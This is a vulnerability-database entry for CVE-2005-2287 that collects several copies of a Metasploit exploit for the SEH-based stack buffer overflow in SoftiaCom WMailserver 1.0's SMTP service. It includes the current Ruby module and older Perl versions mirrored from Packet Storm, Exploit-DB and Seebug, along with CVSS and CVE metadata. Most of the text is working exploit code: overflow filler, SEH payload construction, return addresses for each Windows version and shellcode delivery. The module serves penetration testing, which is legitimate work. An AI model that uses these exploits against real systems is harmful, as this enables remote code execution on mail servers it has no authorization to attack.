ID MSF:EXPLOIT/WINDOWS/SMTP/WMAILSERVER
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
(SMTP) via a SEH frame overwrite.
},
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2005-2287' ],
[ 'OSVDB', '17883' ],
[ 'BID', '14213' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Targets' =>
[
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 11 2005'))
register_options([ Opt::RPORT(25) ])
end
def exploit
connect
filler = " " + rand_text_alpha_upper(5115)
seh = generate_seh_payload(target.ret)
sploit = filler + seh + rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
{"id": "MSF:EXPLOIT/WINDOWS/SMTP/WMAILSERVER", "type": "metasploit", "bulletinFamily": "exploit", "title": "SoftiaCom WMailserver 1.0 Buffer Overflow", "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.\n", "published": "2006-12-23T18:32:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287"], "cvelist": ["CVE-2005-2287"], "lastseen": "2020-07-13T04:26:09", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2287"]}, {"type": "exploitdb", "idList": ["EDB-ID:1463"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83132"]}, {"type": "seebug", "idList": ["SSV:13603"]}]}, "score": {"value": 6.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2005-2287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF"]}, {"type": "kitploit", "idList": ["KITPLOIT:5653496433376619357", "KITPLOIT:8458155717277021778"]}, {"type": "n0where", "idList": ["N0WHERE:161003"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83132"]}, {"type": "seebug", "idList": ["SSV:13603"]}]}, "exploitation": null, "vulnersScore": 6.2}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/wmailserver.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.\n },\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2005-2287' ],\n [ 'OSVDB', '17883' ],\n [ 'BID', '14213' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All', \t\t{ 'Ret' => 0x75022ac4 } ],\n [ 'Windows XP Pro SP0/SP1 English', \t\t{ 'Ret' => 0x71aa32ad } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 11 2005'))\n\n register_options([ Opt::RPORT(25) ])\n end\n\n def exploit\n connect\n\n filler = \" \" + rand_text_alpha_upper(5115)\n seh = generate_seh_payload(target.ret)\n sploit = filler + seh + rand_text_alpha_upper(200)\n\n print_status(\"Trying target #{target.name}...\")\n sock.put(sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "edition": 2, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}
{"packetstorm": [{"lastseen": "2016-12-05T22:15:28", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "SoftiaCom WMailserver 1.0 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2005-2287"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83132", "href": "https://packetstormsecurity.com/files/83132/SoftiaCom-WMailserver-1.0-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 \n(SMTP) via a SEH frame overwrite. \n}, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-2287' ], \n[ 'OSVDB', '17883' ], \n[ 'BID', '14213' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Platform' => 'win', \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 600, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Targets' => \n[ \n[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], \n[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jul 11 2005 ')) \n \nregister_options([ Opt::RPORT(25) ], self.class) \nend \n \ndef exploit \nconnect \n \nfiller = \" \" + rand_text_alpha_upper(5115) \nseh = generate_seh_payload(target.ret) \nsploit = filler + seh + rand_text_alpha_upper(200) \n \nprint_status(\"Trying target #{target.name}...\") \nsock.put(sploit + \"\\r\\n\\r\\n\") \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83132/wmailserver.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:48", "description": "\nSoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "edition": 2, "cvss3": {}, "published": "2006-02-01T00:00:00", "title": "SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2287"], "modified": "2006-02-01T00:00:00", "id": "EXPLOITPACK:9DA7943ACC8B72B52DEDC70FAAFA0AEF", "href": "", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::wmailserver_smtp;\nuse base \"Msf::Exploit\";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\n\t },\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\n\t'Payload' =>\n\t {\n\t\t'Space' => 600,\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20:=+\\x22\",\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\n\t'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\n\tvia a SEH frame overwrite.\n}),\n\n\t'Refs' =>\n\t [\n\t\t['CVE', 'CAN-2005-2287'],\n\t\t['BID', '14213'],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\n\t\t['Windows 2000 English ALL', 0x75022ac4],\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\n\t ],\n\t'Keys' => ['smtp'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n\n\tif (! $self->InitNops(128)) {\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\n\t\treturn;\n\t}\n\n\tmy $splat = Pex::Text::UpperCaseText(5117);\n\n\tmy $sploit =\n\t \" \". $splat. \"\\xeb\\x06\". pack('V', $target->[1]).\n\t $shellcode. \"\\r\\n\\r\\n\";\n\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\n\t$s->Send($sploit);\n\t$self->Handler($s);\n\t$s->Close();\n\treturn;\n}\n\n1;\n\n# milw0rm.com [2006-02-01]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T22:31:40", "description": "No description provided by source.", "cvss3": {}, "published": "2006-02-01T00:00:00", "type": "seebug", "title": "SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2005-2287"], "modified": "2006-02-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-13603", "id": "SSV:13603", "sourceData": "\n \n##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::wmailserver_smtp;\nuse base "Msf::Exploit";\nuse strict;\nuse Pex::Text;\n\nmy $advanced = { };\n\nmy $info =\n {\n\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\n\t'Arch' => [ 'x86' ],\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\n\t'Priv' => 0,\n\t'UserOpts' =>\n\t {\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\n\t },\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\n\t'Payload' =>\n\t {\n\t\t'Space' => 600,\n\t\t'BadChars' => "\\x00\\x0a\\x0d\\x20:=+\\x22",\n\t\t'Prepend' => "\\x81\\xc4\\xff\\xef\\xff\\xff\\x44",\n\t\t'Keys' => ['+ws2ord'],\n\t },\n\n\t'Description' => Pex::Text::Freeform(qq{\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\n\tvia a SEH frame overwrite.\n}),\n\n\t'Refs' =>\n\t [\n\t\t['CVE', 'CAN-2005-2287'],\n\t\t['BID', '14213'],\n\t ],\n\t'Targets' =>\n\t [\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\n\t\t['Windows 2000 English ALL', 0x75022ac4],\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\n\t ],\n\t'Keys' => ['smtp'],\n };\n\nsub new {\n\tmy $class = shift;\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\treturn($self);\n}\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy $target_host = $self->GetVar('RHOST');\n\tmy $target_port = $self->GetVar('RPORT');\n\tmy $target_idx = $self->GetVar('TARGET');\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $target = $self->Targets->[$target_idx];\n\n\tif (! $self->InitNops(128)) {\n\t\t$self->PrintLine("[*] Failed to initialize the nop module.");\n\t\treturn;\n\t}\n\n\tmy $splat = Pex::Text::UpperCaseText(5117);\n\n\tmy $sploit =\n\t " ". $splat. "\\xeb\\x06". pack('V', $target->[1]).\n\t $shellcode. "\\r\\n\\r\\n";\n\n\t$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));\n\n\tmy $s = Msf::Socket::Tcp->new\n\t (\n\t\t'PeerAddr' => $target_host,\n\t\t'PeerPort' => $target_port,\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\t\t'SSL' => $self->GetVar('SSL'),\n\t );\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\n\t$s->Send($sploit);\n\t$self->Handler($s);\n\t$s->Close();\n\treturn;\n}\n\n1;\n\n# sebug.net\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-13603", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:12:43", "description": "SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.", "cvss3": {}, "published": "2005-07-18T04:00:00", "type": "cve", "title": "CVE-2005-2287", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2287"], "modified": "2016-10-18T03:25:00", "cpe": ["cpe:/a:softiacom:wmailserver:2.0", "cpe:/a:softiacom:wmailserver:1.0"], "id": "CVE-2005-2287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2287", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:softiacom:wmailserver:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:softiacom:wmailserver:1.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T07:13:22", "description": "", "cvss3": {}, "published": "2006-02-01T00:00:00", "type": "exploitdb", "title": "SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2287", "2005-2287"], "modified": "2006-02-01T00:00:00", "id": "EDB-ID:1463", "href": "https://www.exploit-db.com/exploits/1463", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::wmailserver_smtp;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\n\r\nmy $advanced = { };\r\n\r\nmy $info =\r\n {\r\n\r\n\t'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',\r\n\t'Version' => '$Revision: 1.1 $',\r\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],\r\n\t'Priv' => 0,\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\r\n\t\t'SSL' => [0, 'BOOL', 'Use SSL'],\r\n\t },\r\n\t'AutoOpts' => { 'EXITFUNC' => 'thread' },\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 600,\r\n\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20:=+\\x22\",\r\n\t\t'Prepend' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\tThis module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)\r\n\tvia a SEH frame overwrite.\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['CVE', 'CAN-2005-2287'],\r\n\t\t['BID', '14213'],\r\n\t ],\r\n\t'Targets' =>\r\n\t [\r\n\t\t['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],\r\n\t\t['Windows 2000 English ALL', 0x75022ac4],\r\n\t\t['Windows XP English SP0/SP1', 0x71aa32ad],\r\n\t ],\r\n\t'Keys' => ['smtp'],\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit\r\n{\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tif (! $self->InitNops(128)) {\r\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tmy $splat = Pex::Text::UpperCaseText(5117);\r\n\r\n\tmy $sploit =\r\n\t \" \". $splat. \"\\xeb\\x06\". pack('V', $target->[1]).\r\n\t $shellcode. \"\\r\\n\\r\\n\";\r\n\r\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\n\r\n\t$s->Send($sploit);\r\n\t$self->Handler($s);\r\n\t$s->Close();\r\n\treturn;\r\n}\r\n\r\n1;\r\n\r\n# milw0rm.com [2006-02-01]", "sourceHref": "https://www.exploit-db.com/download/1463", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
